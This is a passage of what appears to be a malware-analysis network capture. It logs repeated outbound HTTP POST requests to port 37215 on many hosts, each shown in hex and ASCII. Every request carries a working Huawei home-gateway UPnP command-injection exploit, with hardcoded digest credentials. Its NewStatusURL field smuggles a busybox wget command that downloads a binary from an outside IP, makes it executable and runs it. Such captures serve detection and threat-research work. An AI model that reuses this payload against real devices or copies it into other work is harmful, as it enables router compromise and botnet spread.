2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2433192.168.2.155575841.7.98.7337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.812663078 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2434192.168.2.155474641.83.158.19037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.812726021 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2435192.168.2.155352841.82.230.12937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.812752962 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2436192.168.2.155582841.137.100.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.812782049 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2437192.168.2.153394841.2.30.3437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.812844038 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2438192.168.2.155179641.203.151.9637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.812871933 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2439192.168.2.155125641.224.176.15237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.812901020 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2440192.168.2.153503041.250.172.4037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.812959909 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2441192.168.2.154038841.64.203.7237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.812980890 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2442192.168.2.155739441.190.130.7437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.813000917 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2443192.168.2.153900241.233.213.16037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:18.813024044 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
